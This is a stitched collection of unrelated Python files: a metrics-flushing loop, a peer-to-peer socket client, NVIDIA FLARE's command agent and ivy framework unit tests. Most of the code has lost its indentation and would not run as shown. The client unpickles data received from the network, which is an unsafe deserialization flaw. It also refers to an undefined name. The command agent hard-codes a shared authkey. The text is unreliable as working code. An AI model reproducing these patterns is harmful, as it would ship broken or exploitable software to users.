returning, we wait to flush one more time to make sure that all the
metrics were sent.
"""
message = self.message_q.get()
while message:
self._CallMetric(message)
message = self._WaitForNextMessage()
if self.pending:
self._WaitToFlush()
def _CallMetric(self, message):
"""Calls the metric method from |message|, ignoring exceptions."""
try:
cls = getattr(metrics, message.metric_name)
metric = cls(*message.metric_args, **message.metric_kwargs)
if message.reset_after:
self.reset_after_flush.append(metric)
getattr(metric, message.method)(
*message.method_args,
**message.method_kwargs)
self.pending = True
except Exception:
logging.exception('Caught an exception while running %s',
_MethodCallRepr(message))
def _WaitForNextMessage(self):
"""Waits for a new message, flushing every |FLUSH_INTERVAL| seconds."""
while True:
time_delta = self._FlushIfReady()
try:
timeout = FLUSH_INTERVAL - time_delta
message = self.message_q.get(timeout=timeout)
return message
except Queue.Empty:
pass
def _WaitToFlush(self):
"""Sleeps until the next time we can call metrics.Flush(), then flushes."""
time_delta = time.time() - self.last_flush
time.sleep(max(0, FLUSH_INTERVAL - time_delta))
metrics.Flush(reset_after=self.reset_after_flush)
def _FlushIfReady(self):
"""Call metrics.Flush() if we are ready and have pending metrics.
This allows us to only call flush every FLUSH_INTERVAL seconds.
"""
now = time.time()
time_delta = now - self.last_flush
if time_delta > FLUSH_INTERVAL:
self.last_flush = now
time_delta = 0
metrics.Flush(reset_after=self.reset_after_flush)
self.pending = False
return time_delta
def _MethodCallRepr(message):
"""Gives a string representation of |obj|.|method|(*|args|, **|kwargs|)
Args:
message: A MetricCall object.
"""
if not message:
return repr(message)
  obj = message.metric_name
  method = message.method
  args = message.method_args
  kwargs = message.method_kwargs
args_strings = (map(repr, args) +
[(str(k) + '=' + repr(v))
for k, v in kwargs.iteritems()])
return '%s.%s(%s)' % (repr(obj), method, ', '.join(args_strings))
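# Hedged usage sketch (not part of the original module): SetupTsMonGlobalState
# returns a context manager, so a typical caller wraps its main loop in it.
# 'my_service' is a placeholder name; indirect=True is only needed when the
# caller forks worker processes.
if __name__ == '__main__':
  with SetupTsMonGlobalState('my_service', indirect=True):
    pass  # emit metrics through chromite.lib.metrics inside this block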
|
client.py
|
"""
This file takes care of the client side of the peer to peer network
This file takes care of the file being downloaded on to the machine
"""
from server_client.constants import *
import pickle
import socket
import sys
import threading
class Client:
def __init__(self, addr, hashlist):
try:
# set up the socket
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this allows python to use the recently closed socket
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# set up socket connection
self.s.connect((addr, PORT))
# establish DHT variables
self.hashlist = hashlist
self.hashes = {} # these will be the file hashes paired with IP addresses
# update and output all the hashes for the files in the shared folder
            j_thread = threading.Thread(target=self.update_hashes)
j_thread.daemon = True
j_thread.start()
            # create a sender thread so the request goes out on a different thread
i_thread = threading.Thread(target=self.send_message)
i_thread.daemon = True
i_thread.start()
# send the message requesting data so that it is constantly listening
while True:
                data = self.recieve_message()
if not data:
# means the server has failed
print("-" * 21 + " Server failed " + "-" * 21)
break
elif data[0:1] == b'\x11':
print("Got peers")
                    # first byte is the byte '\x11' we added to make sure that we have peers
self.update_peers(data[1:])
except Exception as e:
sys.exit()
"""
    This thread will deal with printing the received message
"""
def recieve_message(self):
try:
while True:
print("Recieving -------")
data = self.s.recv(BYTE_SIZE)
if not data:
break
print("\nRecieved message on the client side is:")
d = pickle.loads(data)
print(d)
excluded_files = self.compare_hashes(d)
#for file in hashes:
# file_exists = False
"""
if self.previous_data != data:
fileIO.create_file(data)
self.previous_data = data
# TODO download the file to the computer
"""
return data
except KeyboardInterrupt:
self.send_disconnect_signal()
def compare_hashes(self,data):
print(data)
exc_list = []
for i in data:
print(i)
            if i in self.hashes:
print(HOST,"has",i)
else:
exc_list.append(i)
print(HOST,"does not have",i)
return exc_list
"""
This method will append the list of file hashes to the hash table
and output the final hash table of values
"""
def update_hashes(self):
for i in self.hashlist:
            self.hashes.setdefault(i, []).append(HOST)
print("Have appended",i,"to",HOST)
print("The hash table of files is the following:")
hash_items = self.hashes.items()
for item in hash_items:
print(item)
"""
This method updates the list of peers
"""
def update_peers(self, peers):
        # our peers list would look like 127.0.0.1, 192.168.1.1,
# we do -1 to remove the last value which would be None
p2p.peers = str(peers, "utf-8").split(',')[:-1]
"""
This method is used to send the message
:param: msg -> The optional message to send
"""
def send_message(self):
try:
#while True:
# encode the message into bytes
# other code will run when this happens as the thread is busy
# request to download the file
self.s.send(REQUEST_STRING.encode('utf-8'))
except KeyboardInterrupt as e:
# If a user turns the server off due to KeyboardInterrupt
self.send_disconnect_signal()
return
def send_disconnect_signal(self):
print("Disconnected from server")
# signal the server that the connection has closed
self.s.send("q".encode('utf-8'))
sys.exit()
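# Hedged usage sketch: it assumes PORT, HOST, BYTE_SIZE and REQUEST_STRING are
# supplied by server_client.constants as the imports above suggest. The
# constructor blocks and keeps requesting/receiving data until the server
# fails, so it is normally the last call in a peer script; both the address
# and the single hash below are placeholder values.
if __name__ == "__main__":
    Client("127.0.0.1", ["d41d8cd98f00b204e9800998ecf8427e"])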
|
command_agent.py
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from multiprocessing.connection import Listener
from nvflare.apis.fl_context import FLContext
from .admin_commands import AdminCommands
class CommandAgent(object):
def __init__(self, federated_client, listen_port, client_runner) -> None:
self.federated_client = federated_client
self.listen_port = int(listen_port)
self.client_runner = client_runner
self.thread = None
self.asked_to_stop = False
self.commands = AdminCommands.commands
def start(self, fl_ctx: FLContext):
# self.thread = threading.Thread(target=listen_command, args=[federated_client, int(listen_port), client_runner])
self.thread = threading.Thread(target=listen_command, args=[self, fl_ctx])
self.thread.start()
pass
def listen_command(self, fl_ctx):
try:
address = ("localhost", self.listen_port) # family is deduced to be 'AF_INET'
listener = Listener(address, authkey="client process secret password".encode())
conn = listener.accept()
print(f"Created the listener on port: {self.listen_port}")
try:
while not self.asked_to_stop:
if conn.poll(1.0):
msg = conn.recv()
command_name = msg.get("command")
data = msg.get("data")
command = AdminCommands.get_command(command_name)
if command:
engine = fl_ctx.get_engine()
with engine.new_context() as new_fl_ctx:
reply = command.process(data=data, fl_ctx=new_fl_ctx)
if reply:
conn.send(reply)
except Exception as e:
# traceback.print_exc()
print(f"Process communication exception: {self.listen_port}.")
finally:
conn.close()
listener.close()
except Exception as e:
print(f"Could not create the listener for this process on port: {self.listen_port}.")
pass
def shutdown(self):
self.asked_to_stop = True
if self.thread and self.thread.is_alive():
self.thread.join()
def listen_command(agent: CommandAgent, fl_ctx: FLContext):
agent.listen_command(fl_ctx)
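# Hedged sketch (not part of the original module) of how a peer process could
# talk to this agent. It mirrors the Listener configuration above (localhost,
# the same port and authkey) and sends the {"command": ..., "data": ...} dict
# that listen_command() expects; "check_status" is a placeholder command name.
def _send_admin_command_example(listen_port: int):
    from multiprocessing.connection import Client

    with Client(("localhost", int(listen_port)),
                authkey="client process secret password".encode()) as conn:
        conn.send({"command": "check_status", "data": {}})
        if conn.poll(5.0):
            return conn.recv()
        return None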
|
test_general.py
|
"""Collection of tests for unified general functions."""
# global
import time
import einops
import jax.numpy as jnp
import pytest
from hypothesis import given, strategies as st
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import threading
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
import ivy.functional.backends.numpy as ivy_np
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
length = len(lst[0])
if not all(len(item) == length for item in lst):
msg = "not all lists have the same length"
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
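# e.g. _get_shape_of_list([[1, 2], [3, 4], [5, 6]]) == (3, 2); a ragged input
# such as [[1, 2], [3]] raises ValueError instead.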
# Tests #
# ------#
# set_framework
@given(fw_str=st.sampled_from(["numpy", "jax", "torch", "mxnet"]))
def test_set_framework(fw_str, device, call):
ivy.set_backend(fw_str)
ivy.unset_backend()
# use_framework
def test_use_within_use_framework(device, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@given(allow_duplicates=st.booleans())
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
def func_b(a, d, e=5):
return None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {"a": 0, "b": 1, "c": 2, "d": 3, "e": 4, "f": 5, "g": 6}
kwfa, kwfb, kwca = ivy.match_kwargs(
kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates
)
if allow_duplicates:
assert kwfa == {"a": 0, "b": 1, "c": 2}
assert kwfb == {"a": 0, "d": 3, "e": 4}
assert kwca == {"c": 2, "f": 5, "g": 6}
else:
assert kwfa == {"a": 0, "b": 1, "c": 2}
assert kwfb == {"d": 3, "e": 4}
assert kwca == {"f": 5, "g": 6}
def test_get_referrers_recursive(device, call):
class SomeClass:
def __init__(self):
self.x = [1, 2]
self.y = [self.x]
some_obj = SomeClass()
refs = ivy.get_referrers_recursive(some_obj.x)
ref_keys = refs.keys()
assert len(ref_keys) == 3
assert "repr" in ref_keys
assert refs["repr"] == "[1,2]"
y_id = str(id(some_obj.y))
y_refs = refs[y_id]
assert y_refs["repr"] == "[[1,2]]"
some_obj_dict_id = str(id(some_obj.__dict__))
assert y_refs[some_obj_dict_id] == "tracked"
dict_refs = refs[some_obj_dict_id]
assert dict_refs["repr"] == "{'x':[1,2],'y':[[1,2]]}"
some_obj_id = str(id(some_obj))
some_obj_refs = dict_refs[some_obj_id]
assert some_obj_refs["repr"] == str(some_obj).replace(" ", "")
assert len(some_obj_refs) == 1
# copy array
@given(dtype_and_x=helpers.dtype_and_values(ivy_np.valid_dtypes))
def test_copy_array(dtype_and_x, device, call, fw):
dtype, x = dtype_and_x
if fw == "torch" and dtype in ["uint16", "uint32", "uint64"]:
return
if call in [helpers.mx_call] and dtype == "int16":
# mxnet does not support int16
return
# smoke test
x = ivy.array(x, dtype=dtype, device=device)
ret = ivy.copy_array(x)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
helpers.assert_all_close(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# array_equal
@given(x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes, n_arrays=2))
def test_array_equal(x0_n_x1_n_res, device, call, fw):
dtype0, x0 = x0_n_x1_n_res[0][0], x0_n_x1_n_res[1][0]
dtype1, x1 = x0_n_x1_n_res[0][1], x0_n_x1_n_res[1][1]
if fw == "torch" and (
dtype0 in ["uint16", "uint32", "uint64"]
or dtype1 in ["uint16", "uint32", "uint64"]
):
# torch does not support those dtypes
return
if call in [helpers.mx_call] and (
dtype0 in ["int16", "bool"] or dtype1 in ["int16", "bool"]
):
# mxnet does not support int16, and does not support
# bool for broadcast_equal method used
return
# smoke test
x0 = ivy.array(x0, dtype=dtype0, device=device)
x1 = ivy.array(x1, dtype=dtype1, device=device)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_ivy_array(x0)
assert ivy.is_ivy_array(x1)
assert isinstance(res, bool) or ivy.is_ivy_array(res)
# value test
assert res == np.array_equal(np.array(x0, dtype=dtype0), np.array(x1, dtype=dtype1))
# arrays_equal
@given(x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes, n_arrays=3))
def test_arrays_equal(x0_n_x1_n_res, device, call, fw):
dtype0, x0 = x0_n_x1_n_res[0][0], x0_n_x1_n_res[1][0]
dtype1, x1 = x0_n_x1_n_res[0][1], x0_n_x1_n_res[1][1]
dtype2, x2 = x0_n_x1_n_res[0][2], x0_n_x1_n_res[1][2]
if fw == "torch" and (
dtype0 in ["uint16", "uint32", "uint64"]
or dtype1 in ["uint16", "uint32", "uint64"]
or dtype2 in ["uint16", "uint32", "uint64"]
):
# torch does not support those dtypes
return
if call in [helpers.mx_call] and (
dtype0 in ["int16", "bool"] or dtype1 in ["int16", "bool"]
):
# mxnet does not support int16, and does not support bool
# for broadcast_equal method used
return
# smoke test
x0 = ivy.array(x0, dtype=dtype0, device=device)
x1 = ivy.array(x1, dtype=dtype1, device=device)
x2 = ivy.array(x2, dtype=dtype2, device=device)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_ivy_array(x0)
assert ivy.is_ivy_array(x1)
assert ivy.is_ivy_array(x2)
assert isinstance(res, bool) or ivy.is_ivy_array(res)
# value test
true_res = (
np.array_equal(ivy.to_numpy(x0), ivy.to_numpy(x1))
and np.array_equal(ivy.to_numpy(x0), ivy.to_numpy(x2))
and np.array_equal(ivy.to_numpy(x1), ivy.to_numpy(x2))
)
assert res == true_res
# to_numpy
@given(x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes))
def test_to_numpy(x0_n_x1_n_res, device, call, fw):
dtype, object_in = x0_n_x1_n_res
if fw == "torch" and (dtype in ["uint16", "uint32", "uint64"]):
# torch does not support those dtypes
return
if call in [helpers.mx_call] and dtype == "int16":
# mxnet does not support int16
return
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
return
# smoke test
ret = ivy.to_numpy(ivy.array(object_in, dtype=dtype, device=device))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
helpers.assert_all_close(ret, np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# to_scalar
@given(
object_in=st.sampled_from([[0.0], [[[1]]], [True], [[1.0]]]),
dtype=st.sampled_from(ivy_np.valid_dtypes),
)
def test_to_scalar(object_in, dtype, device, call, fw):
if fw == "torch" and (dtype in ["uint16", "uint32", "uint64"]):
# torch does not support those dtypes
return
if call in [helpers.mx_call] and dtype == "int16":
# mxnet does not support int16
return
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
return
# smoke test
ret = ivy.to_scalar(ivy.array(object_in, dtype=dtype, device=device))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(ivy.array(object_in, dtype=dtype, device=device)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
# to_list
@given(x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes))
def test_to_list(x0_n_x1_n_res, device, call, fw):
dtype, object_in = x0_n_x1_n_res
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
return
# smoke test
arr = ivy.array(object_in, dtype=dtype, device=device)
ret = ivy.to_list(arr)
    # type test (result won't be a list if input is 0 dimensional)
if arr.ndim != 0:
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(
np.nan_to_num(
np.asarray(ivy.to_list(ivy.array(object_in, dtype=dtype, device=device))),
posinf=np.inf,
neginf=-np.inf,
),
np.nan_to_num(np.array(object_in).astype(dtype), posinf=np.inf, neginf=-np.inf),
)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
# shape
@given(
x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes),
as_tensor=st.booleans(),
tensor_fn=st.sampled_from([ivy.array, helpers.var_fn]),
)
def test_shape(x0_n_x1_n_res, as_tensor, tensor_fn, device, call, fw):
dtype, object_in = x0_n_x1_n_res
if fw == "torch" and (
dtype in ["uint16", "uint32", "uint64"]
or (dtype not in ivy_np.valid_float_dtypes and tensor_fn == helpers.var_fn)
):
# torch does not support those dtypes
return
ret = ivy.shape(tensor_fn(object_in, dtype=dtype, device=device), as_tensor)
# type test
if as_tensor:
assert ivy.is_ivy_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(
ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32)
)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# get_num_dims
@given(
x0_n_x1_n_res=helpers.dtype_and_values(ivy_np.valid_dtypes),
as_tensor=st.booleans(),
tensor_fn=st.sampled_from([ivy.array, helpers.var_fn]),
)
def test_get_num_dims(x0_n_x1_n_res, as_tensor, tensor_fn, device, call, fw):
dtype, object_in = x0_n_x1_n_res
if fw == "torch" and (
dtype in ["uint16", "uint32", "uint64"]
or (dtype not in ivy_np.valid_float_dtypes and tensor_fn == helpers.var_fn)
):
# torch does not support those dtypes
return
ret = ivy.get_num_dims(tensor_fn(object_in, dtype=dtype, device=device), as_tensor)
# type test
if as_tensor:
assert ivy.is_ivy_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(
ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32)
)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# clip_vector_norm
@pytest.mark.parametrize(
"x_max_norm_n_p_val_clipped",
[
(-0.5, 0.4, 2.0, -0.4),
([1.7], 1.5, 3.0, [1.5]),
(
[[0.8, 2.2], [1.5, 0.2]],
4.0,
1.0,
[[0.6808511, 1.8723406], [1.2765958, 0.17021278]],
),
(
[[0.8, 2.2], [1.5, 0.2]],
2.5,
2.0,
[[0.71749604, 1.9731141], [1.345305, 0.17937401]],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("with_out", [True, False])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_clip_vector_norm(
x_max_norm_n_p_val_clipped, dtype, with_out, tensor_fn, device, call
):
# smoke test
if call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype=dtype, device=device)
max_norm = x_max_norm_n_p_val_clipped[1]
p_val = x_max_norm_n_p_val_clipped[2]
clipped = x_max_norm_n_p_val_clipped[3]
if with_out:
out = ivy.zeros(x.shape if len(x.shape) else (1,))
ret = ivy.clip_vector_norm(x, max_norm, p_val, out=out)
else:
ret = ivy.clip_vector_norm(x, max_norm, p_val)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == (x.shape if len(x.shape) else (1,))
# value test
assert np.allclose(
call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped)
)
if with_out:
if not ivy.current_backend_str() in ["tensorflow", "jax"]:
# these backends do not support native inplace updates
assert ret is out
assert ret.data is out.data
# compilation test
if call is helpers.torch_call:
# pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
return
# floormod
# @given(
# xy=helpers.dtype_and_values(ivy_np.valid_numeric_dtypes, n_arrays=2),
# as_variable=st.booleans(),
# with_out=st.booleans(),
# num_positional_args=st.integers(1, 2),
# native_array=st.booleans(),
# container=st.booleans(),
# instance_method=st.booleans(),
# )
# def test_floormod(
# xy,
# as_variable,
# with_out,
# num_positional_args,
# native_array,
# container,
# instance_method,
# device,
# call,
# fw,
# ):
# # smoke test
# dtype = xy[0]
# x = xy[1][0]
# divisor = np.abs(xy[1][1])
# if 0 in divisor:
# return
# if fw == "torch" and any(d in ["uint16", "uint32", "uint64"] for d in dtype):
# return
# helpers.test_array_function(
# dtype,
# as_variable,
# with_out,
# num_positional_args,
# native_array,
# container,
# instance_method,
# fw,
# "floormod",
# x=np.asarray(x, dtype=dtype[0]),
# y=np.asarray(divisor, dtype=dtype[1]),
# )
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0.0, 1.0, 2.0]], 0), ([[0.0, 1.0, 2.0]], 1)]
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, device, call):
# smoke test
x, axis = x_n_axis
if (
isinstance(x, Number)
and tensor_fn == helpers.var_fn
and call is helpers.mx_call
):
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype=dtype, device=device)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (
axis % len(x.shape)
if (axis is not None and len(x.shape) != 0)
else len(x.shape) - 1
)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(
call(ivy.unstack, x, axis),
np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)),
)
# fourier_encode
@pytest.mark.parametrize(
"x_n_mf_n_nb_n_gt",
[
(
[2.0],
4.0,
4,
[
[
2.0000000e00,
1.7484555e-07,
9.9805772e-01,
-5.2196848e-01,
3.4969111e-07,
1.0000000e00,
-6.2295943e-02,
-8.5296476e-01,
1.0000000e00,
]
],
),
(
[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
[2.0, 4.0],
4,
[
[
[
1.0000000e00,
-8.7422777e-08,
-8.7422777e-08,
-8.7422777e-08,
-8.7422777e-08,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
],
[
2.0000000e00,
1.7484555e-07,
9.9805772e-01,
-5.2196848e-01,
-6.0398321e-07,
1.0000000e00,
-6.2295943e-02,
-8.5296476e-01,
1.0000000e00,
],
],
[
[
3.0000000e00,
-2.3849761e-08,
-2.3849761e-08,
-2.3849761e-08,
-2.3849761e-08,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
],
[
4.0000000e00,
3.4969111e-07,
-1.2434989e-01,
8.9044148e-01,
-1.2079664e-06,
1.0000000e00,
-9.9223840e-01,
4.5509776e-01,
1.0000000e00,
],
],
[
[
5.0000000e00,
-6.7553248e-07,
-6.7553248e-07,
-6.7553248e-07,
-6.7553248e-07,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
-1.0000000e00,
],
[
6.0000000e00,
4.7699523e-08,
-9.8256493e-01,
-9.9706185e-01,
-3.7192983e-06,
1.0000000e00,
1.8591987e-01,
7.6601014e-02,
1.0000000e00,
],
],
],
),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, device, call):
# smoke test
x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
if (
isinstance(x, Number)
and tensor_fn == helpers.var_fn
and call is helpers.mx_call
):
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype=dtype, device=device)
if isinstance(max_freq, list):
max_freq = tensor_fn(max_freq, dtype=dtype, device=device)
ret = ivy.fourier_encode(x, max_freq, num_bands)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else list(x.shape)
expected_shape = x_shape + [1 + 2 * num_bands]
assert list(ret.shape) == expected_shape
# value test
assert np.allclose(
call(ivy.fourier_encode, x, max_freq, num_bands),
np.array(ground_truth),
atol=1e-5,
)
# indices_where
@pytest.mark.parametrize("x", [[True], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, device, call):
# smoke test
if (
isinstance(x, Number)
and tensor_fn == helpers.var_fn
and call is helpers.mx_call
):
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype=dtype, device=device)
ret = ivy.indices_where(x)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(
call(ivy.indices_where, x),
np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))),
)
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)]
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, device, call):
# smoke test
ind, depth = ind_n_depth
if (
isinstance(ind, Number)
and tensor_fn == helpers.var_fn
and call is helpers.mx_call
):
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, dtype="int32", device=device)
ret = ivy.one_hot(ind, depth, device=device)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(
call(ivy.one_hot, ind, depth, device=device),
np.asarray(
ivy.functional.backends.numpy.one_hot(
ivy.to_numpy(ind), depth, device=device
)
),
)
# cumsum
@pytest.mark.parametrize(
"x_n_axis",
[
([[0.0, 1.0, 2.0]], -1),
([[0.0, 1.0, 2.0], [2.0, 1.0, 0.0]], 0),
([[0.0, 1.0, 2.0], [2.0, 1.0, 0.0]], 1),
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("with_out", [True, False])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, with_out, tensor_fn, device, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype=dtype, device=device)
if with_out:
if ivy.exists(axis):
out = ivy.zeros(x.shape)
ret = ivy.cumsum(x, axis, out=out)
else:
out = ivy.zeros(ivy.reshape(x, (-1,)).shape)
ret = ivy.cumsum(x, axis, out=out)
else:
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(
call(ivy.cumsum, x, axis),
np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)),
)
# out test
if with_out:
if not ivy.current_backend_str() in ["tensorflow", "jax"]:
# these backends do not support native inplace updates
assert ret is out
assert ret.data is out.data
# cumprod
@pytest.mark.parametrize(
"x_n_axis",
[
([[0.0, 1.0, 2.0]], -1),
([[0.0, 1.0, 2.0], [2.0, 1.0, 0.0]], 0),
([[0.0, 1.0, 2.0], [2.0, 1.0, 0.0]], 1),
],
)
@pytest.mark.parametrize("exclusive", [True, False])
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("with_out", [True, False])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, with_out, tensor_fn, device, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype=dtype, device=device)
if with_out:
if ivy.exists(axis):
out = ivy.zeros(x.shape)
ret = ivy.cumprod(x, axis, exclusive=exclusive, out=out)
else:
out = ivy.zeros(ivy.reshape(x, (-1,)).shape)
ret = ivy.cumprod(x, axis, exclusive=exclusive, out=out)
else:
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(
call(ivy.cumprod, x, axis, exclusive),
np.asarray(
ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)
),
)
# out test
if with_out:
if not ivy.current_backend_str() in ["tensorflow", "jax"]:
# these backends do not support native inplace updates
assert ret is out
assert ret.data is out.data
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size_n_tnsr_n_wdup",
[
([0, 4, 1, 2], [1, 2, 3, 4], 8, None, False),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8, None, True),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], None, [11, 10, 9, 8, 7, 6], True),
],
)
@pytest.mark.parametrize("red", ["sum", "min", "max", "replace"])
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(
inds_n_upd_n_size_n_tnsr_n_wdup, red, dtype, tensor_fn, device, call
):
# smoke test
if red in ("sum", "min", "max") and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, size, tensor, with_duplicates = inds_n_upd_n_size_n_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, dtype="int32", device=device)
upd = tensor_fn(upd, dtype=dtype, device=device)
if tensor:
# pytorch variables do not support in-place updates
tensor = (
ivy.array(tensor, dtype=dtype, device=device)
if ivy.current_backend_str() == "torch"
else tensor_fn(tensor, dtype=dtype, device=device)
)
ret = ivy.scatter_flat(inds, upd, size, tensor, red, device=device)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
if size:
assert ret.shape == (size,)
else:
assert ret.shape == tensor.shape
# value test
if red == "replace" and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
assert np.allclose(
call(ivy.scatter_flat, inds, upd, size, tensor, red, device=device),
np.asarray(
ivy.functional.backends.numpy.scatter_flat(
ivy.to_numpy(inds),
ivy.to_numpy(upd),
size,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor,
